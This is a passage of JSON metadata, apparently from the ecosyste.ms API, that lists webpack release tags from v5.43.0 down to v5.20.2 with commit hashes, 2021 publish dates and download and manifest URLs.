tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v